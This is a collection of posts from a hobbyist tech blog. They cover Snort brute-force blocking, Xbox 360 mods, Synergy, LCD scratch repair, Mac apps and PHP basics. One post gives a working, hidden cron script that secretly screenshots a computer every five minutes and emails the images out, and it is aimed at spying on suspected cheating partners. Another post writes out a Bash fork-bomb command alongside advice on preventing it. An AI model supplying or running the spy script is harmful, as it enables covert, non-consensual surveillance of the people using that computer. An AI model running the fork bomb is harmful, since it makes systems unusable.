Hackosis

I got hacked not too long ago, so I decided to setup snort patched with snortsam to stop the intruders. This acually works very well.

They got in by brute forcing a log in page for the web mail interface. The intruders also used the compose mail page to send spam after they broke in.

I wrote my own snort rule to detect and block brute forcing and sending spam through the web mail (It will only block if you have snortsam properly setup). This rule blocks anyone that does an HTTP POST more than 20 times within 10 seconds (I believe it is a ratio - average of 2 times per second).

HINT: Replace X.X.X.X with the IP of your web server. Take out the “fwsam: src, 5 minutes;” if you are not using snortsam (you should be ;p). Replace 123456789 with your own custom ID and make it large so it doesn’t conflict with default snort rules.

Have you wrote any custom snort rules or do you have a suggestion to improve this rule? Show us in the comments.

Geeks love getting the most out of their gaming consoles. I hope you would agree that the Xbox 360 is the best gaming console on the market. I recently purchased an Xbox 360 so I have been looking into what I can do (I know, kinda late). With that being said, I would like to share my top 10 hack finds so far.

1. Turn your Xbox 360 into a Laptop - Like soldering? Engadget takes us through the steps of turning your Xbox 360 into a portable laptop. How. Cool. Is. That.
2. Flashing the DVD firmware to play game backups - If you have owned your Xbox 360 for some time it is possible to flash the firmware on the DVD drive to play game backups (your own backups of course ;)). WARNING - This could ban you from Xbox Live!
3. Play online without Xbox Live for Free - By using Xlink Kai you can play multiplayer LAN games online for free! MS has put a 30ms ping limit on the Xbox 360, so be sure to close all other internet apps before playing. Check out the wiki for more details.
4. Use Your Laptop as a free Xbox Wi-Fi Adapter and save $80 - Use internet connection sharing to wire your Xbox 360 to the internet instead of buying the $80 adapter.
5. DIY Xbox 360 Wifi Adapter - If you don’t want a cord from your Xbox 360 hanging out of your laptop all the time you can always follow Geeks Are Sexy’s guide to a DIY Xbox 360 Wifi adapter.
6. Stream Netflix Movies - By using vmcNetFlix you can watch all your favorite movies from your Netflix subscription.
7. Use your own HDMI cable and save $40 - Chad shows us how to fit the A/V adapter into the Xbox 360 while using your own HDMI cable instead of buying the $40 official Microsoft cable.
8. Turn your Xbox A/V cable into a VGA Cable for $7 - Once again, Engadget to the rescue with DIY instructions on how to turn your standard Xbox 360 A/V cable into a VGA cable on the cheap.
9. Mod your Case - There are limitless ways you can customize your Xbox 360 case. To start you off you can paint the face plate and the controller.
10. Surf the web - If you have Windows Media Center Editon you can surf the web from the comfort of your Xbox 360. Note that this is limited functionality only - no typing, no sound, etc. Basically just a screen shot from your PC (Good enough for pr0n).

Hopefully you ran into something new and there is still more to discover with your Xbox 360. With such an interesting machine to tweak, no wonder everyone has out-done themselves on hacking/modding the Xbox 360.

Have a hack or mod that we didn’t cover? Let us know in the comments.

You have multiple computers, and your desk is cluttered with keyboards, mice, and monitors? You desperately need more space, and you are tired of moving your hands the long way from one keyboard to the next? Do not worry any more - rescue is here in form of synergy.

Synergy is a nifty little program which allows you to share your mouse and keyboard with other computers on your network. Just move the mouse out of your screen and it magically appears on the screen of the next computer allowing you to type there. Additionally, you can share cut and paste selections, so you can cut something on one screen/PC, move the mouse to the other screen and paste your selection there . Synergy is available for Windows (XP, NT), GNU/Linux, Mac OS X, and Unix. And the best thing is you can even mix different operating systems. Sounds interesting? So let’s see how it works.

Synergy is composed of a server (synergys) and a client part (synergyc) which communicate with each other over a network to exchange keyboard and mouse events. The server is started on the main PC whose keyboard and mouse should be shared, and the client is started on each machine which should use the input devices of the server. In the configuration file, you define which screen is to the left, right, top, or bottom of each monitor. (like in other multi-monitor setups). If the mouse is moved over an edge, the control events are sent over the network to the host which is defined in the configuration.

Get it

There are binary packages available at the synergy sourceforge page, but if you are using a OS with package management system I recommend checking if it is available there first. Install synergy on every machine which should participate in the input sharing.

Read the rest of this entry …

From Wikipedia:

The fork bomb is a form of denial of service attack against a computer system that implements the fork operation, or equivalent functionality whereby a running process can create another running process. It is considered a wabbit as fork bomb programs typically do not spread as worms or viruses. It relies on the assumption that the number of programs and processes which may be simultaneously executed on a computer has a limit.

Yes, the command “:(){ :|:& };:” looks like a bunch of rabid smileys, but in fact is a dangerous command that could leave your Linux system unusable until rebooted. The command essentially creates a DoS attack on the system by spawning a large number of processes and very quickly taking all available resources and process slots. This is especially important on multiuser systems like terminal servers, web servers, etc.

The jargon file also defines fork bomb.

Linux is not the only vulnerable OS, but lets focus on the bash command structure for now and I will fill you in on ways to prevent your system from being vulnerable from this command and catching users who attempt to start the fork bomb.

:(){
 :|:&
};:

Essentially the code says:

Bomb the bombs while I drop bombs with even more bombs.

But how do I prevent the fork bomb?

Linux has a handy pam_limits module that can limit the amount of resources any one group or user can take. The configuration is stored in the /etc/security/limits.conf file. This will restrict the user or group from spawning more processes than defined in the configuration.

NOTE: This requires that you have the pam_limits module installed.

Example configuration:

user          hard    nproc           300
@group        hard    nproc           300

Replace ‘user’ with usernames and replace ‘@group’ with group names. You might have to play around with the settings and see what works best for your environment and available resources.

OK, but someone is dropping the fork bomb and I can’t tell who it is!

You could simply look in their ~/.bash_history and see, but that isn’t to say they haven’t deleted it out of the file.

The Linux kernel patch grsecurity could be another solution. I don’t have much experience with the patch so I cannot go into great detail, but the grsecurity forum has a bit of information on the issue.

If you have not setup ways to protect your mutliuser system from the fork bomb, it just might leave you dropping the F bomb. We wouldn’t want to hear any system administrator saying that, would we?

Know any other ways to create the fork bomb? Leave a suggestion in the comments.

I have been reading Lifehacker for some time now. Honestly, the site has been a huge inspiration for this blog. In dedication to Lifehacker and the movement the site has created, I would like to list my favorite Lifehacker posts of all time. After all, it is a bit hard to sort through all the content on the site. ;)

1. Turn Your $60 Router into a User-Friendly Super-Router with Tomato - Adam makes an excellent article about transforming your router into a highly configurable super-router using Tomato. If you have a compatible router and not taking advantage of this hack, you are simply missing out.
2. Install OS X on Your Hackintosh PC, No Hacking Required - Adam comes through again with an easy how to guide on instaling OS X on your PC with the kalyway install disc. No command line required.
3. Trim Down Windows to the Bare Essentials - Adam outlines the process of using nLite to streamline a stripped down version of Windows XP to run on a virtual machine or slow hardware. Also recommended is Game XP and XPlite. I did this even on my work station - after all faster is always better.
4. Hack Attack: Burn almost any video file to a playable DVD - This is something I always get asked to do by non-geeks. Adam recommends using the open source DVD Flick to author your DIY DVDs.
5. Top 10 BitTorrent Tools and Tricks - Adam comes up with 11 tips and tricks for BitTorrenting. While some new some fresh, the ones I recommend are most important: capping your upload and using PG2.
6. How to Track Down Anyone Online - This time Gina steps in with some tips on tracking down peeps online. This is so useful for people that owe me money (and no you cannot barrow any). The resources include different websites and even a Firefox extension.
7. Top 10 Obscure Google Search Tricks - We all know that Google is the most ‘hackable’ search engine around. Gina outlines ten top notch tips to get you going.
8. Turn Your PC into a DVD Ripping Monster - Adam gets you started backing up your DVDs to your PC and even re-burning them. I do believe he missed a couple of tools such as RipIt4Me, but overall details an easy to follow procedure for the task.
9. Top 10 Harmless Geek Pranks - Nothing is more fun than playing pranks on your geek friends. Whether it be April Fool’s day or not, these are some of the best pranks. I think my favorites are the Upside-Down-Ternet and the Total Confusion Pack for Firefox.
10. Transform Your Classic Xbox into a Killer Media Center - This goes hand in hand with our Xbox: Make your own Action Replay Device and is an excellent way to get more use of your old Xbox using XBMC.

There you have the top ten best Lifehacker posts and hacks. Maybe you have seen all of them, maybe you haven’t. Hopefully you have seen something you haven’t before.

Disagree with any of my choices? Let us know in the comments.

Hackosis.com is now open source. This opens up a whole new world of opportunity to this blog and anyone that wants to be involved.

What does this mean?

1. You can modify and redistribute the content on Hackosis.com in any way you like. We don’t require that you give credit, but it is appreciated.
2. You can submit articles to Hackosis using the submission form. We will give you credit.
3. You can participate in modifying posts to improve the quality and content. I have outlined the details on the open source statement page.

Remember, there are no restrictions on what you can submit or modify! Just be sure to follow proper netiquette, cite sources, no stealing content, etc.

My plans in the future include this blog turning into somewhat of a wiki-blog hybrid that everyone can easily take part in. Please contact us if you are interested in helping speed the process.

How does this benefit me?

1. While we prefer that you submit original content, it is not required for inclusion. You could link to your blog or web site.
2. Take part in what will be an awesome community with help from many great minds from around the web (including myself ;P).
3. The potential to be featured on lifehacker.com, digg.com or other great sites.
4. This site receives around 5,000 visits a day, so your content will be seen.
5. This is just the beginning. Remember everything here is changeable. Let your voice be heard.

That’s that, and I now invite you to suggest edits on content (including this post or any pages) and submission of posts. Through a collaborative effort we can make great things happen.

Lets experiment with the process on this page. You don’t have to register to comment.

[changefrom]the original content you wish to change[/changefrom]
[changeto]the new content you wish to change the original content to[/changeto]

Let the games begin…

LCD monitors are obviously more vulnerable to damage than the classic CRT. Even the slightest contact with a sharp object can leave your liquid crystal display damaged.

Fortunately, this is easily fixed. There are two different methods that I have found to work quite well. The first method is a temporary fix and will have to be redone after an amount of time or cleaning the LCD. The second method is more of a permanent fix, but requires more work.

Temporary fix with Vaseline:

1. Clean the surface of the LCD with diluted isopropyl alcohol (50/50 with water) with a cloth. No toilet paper and especially not paper towels. These will scratch your screen.
2. Fill the crack with Vaseline.
3. Gently wipe off the Vaseline outside of the scratch.
4. When you are done there should be enough Vaseline to fill the scratch.

Less temporary fix, more work:

1. Clean the surface of the LCD with diluted isopropyl alcohol (50/50 with water) with a cloth. No toilet paper and especially not paper towels. These will scratch your screen.
2. Apply a bit of auto rubbing compound to the scratch.
3. Polish the effected the area with until flat with felt. You should acually have removed the anti-glare coating in the effected area.
4. Clean the area.
5. Using a piece of paper cut a 5mm hole into the center.
6. Use the paper to spray clear lacquer (through the hole) onto the effected area.
7. Move the paper as you spray if the scratch is lengthy.
8. Let dry according to lacquer instructions and you are done.

I hope that did it for you and if you have any suggestions or improvement to these instructions please leave a comment and I will add it to the post (if it make sense).

[via pcextreme.net]

Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.

By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.

The process is as follows:

1. Cron takes a screen shot of the desktop and saves it to a file using the import command.
2. Cron emails the screenshot to a specified address on a specific interval by using mutt.

The process is quite simple. Just open your terminal follow these steps (tested on Ubuntu, should work on other distros as well):

1. Install postfix, mutt, and imagemagick (for import):
    sudo apt-get install postfix mutt imagemagick
2. Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
     nano /path/to/message.txt
3. Create a file named ’spy.sh’ (save it somewhere secretive) and add the following lines (fifth and sixth lines are one line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory tho):
     #!/bin/sh
   NOW=$(date +%Y%m%d%k%M)
   cd /tmp
   import -window root screenshot-$NOW.jpg
   mutt -s “Screenshot for $NOW” -a ./screenshot-$NOW.jpg emailaccount@domain.com < /path/to/message.txt
   rm /tmp/screenshot-$NOW.jpg
4. Now make the spy.sh executable:
     chmod u+x /path/to/spy.sh
5. Run the following (my cron didn’t run without it):
     sudo touch /etc/cron.deny
6. Edit your crontab ‘ sudo crontab -e‘ and enter the following:
    */5 * * * * /path/to/spy.sh

WARNING: This will email you a screen shot every 5 minutes. While this is great for spying beware that your email could fill up pretty quick! Take out some minutes in your crontab to decrease the interval ex, */10 for every 10 minutes or */20 for every 20 minutes.

TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!

TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.

That’s it! You should start receiving screen shots of your desktop in action once the crontab has been hit the first cycle. If you have any problems or questions feel free to leave a comment.

iTunes

Easily one of the greatest media players available today, iTunes offers music, movies, and a music store, all blended together. Make a playlist, add songs to your iPod, watch a new movie that just released. iTunes is a fantastic experience for any Mac (or PC) user. And guess what? It’s waiting for you at the bottom of your screen. (Mac only :D)

Mozilla Firefox
The Browser That Has It All: Firefox has security, speed and new features that will change the way you use the Web. Don’t settle for anything less.
 

Adium
Adium is an awesome Multi-Client Instant messaging service for Mac OS X. The user interface is neat and simple, and it works great! Very easy to add ALL of your Instant Messaging accounts to one easy-to-use environment!

VLC
Goes with Flip4Mac and is a good player for non-mac media codecs
 
 

Perian
Perian is a free, open source QuickTime component that adds native support for many popular video formats. Good replacement for VLC.
 

Quick Silver
QuickSilver is “A Unified, Extensible interface for working with appliations, contacts, music and other data” and completely free.
 

smcFanControl
smcFanControl lets you control your fans manually to make your MacBook(pro) or Mac mini run cooler.
 

Flip4Mac
Got a weird video from your Windows friends? Well this will allow you to play virtually any video codec!
 

Transmission
Transmission has been built from the ground up to be a lightweight, yet powerful BitTorrent client. Its simple, intuitive interface is designed to integrate tightly with whatever computing environment you choose to use. Transmission strikes a balance between providing useful functionality without feature bloat. Furthermore, it is free for anyone to use or modify.

DropBox
A sleek file syncing program. Multi-platform syncing with a web interface for access everywhere.
 

If you have any other suggestion of things that are missing or in the wrong place please start a discussion by commenting below.

This list was pulled from apple.lockergnome.com on 7-17-08 and I take no credit for it.

PHP and MySQL are one of the most used technologies on the web today. By using about 7 different script files we can add, update, and delete rows from a MySQL table.

Example of completed project:

Download the Simple PHP MySQL Table Editor.

Lets get started. I will explain each section of the script files so you have an understanding of how it works. You can download the project in a zip file above. The download also includes the example MySQL schema structure so you can test the script right away.

All examples in this post assume that you have already typed the php opening and closing tags. I cannot inlcude them on my page due to Wordpress plugins that I am running.

ALSO, because my PHP color coder sometimes runs off the page, you may have to click “show plain code” to view all typed PHP code.

HEADER.PHP:

Header.php stores the HTML header that include the title, etc. I am not going into detail since this is not a HTML tutorial.

I always start my PHP files with comments to indicate the purpose of the script and give contact details in case anyone has questions. Comments in PHP are indicated with ‘//’ for single lines and ‘/*’, ‘*/’ for multiple line comments:
Read the rest of this entry …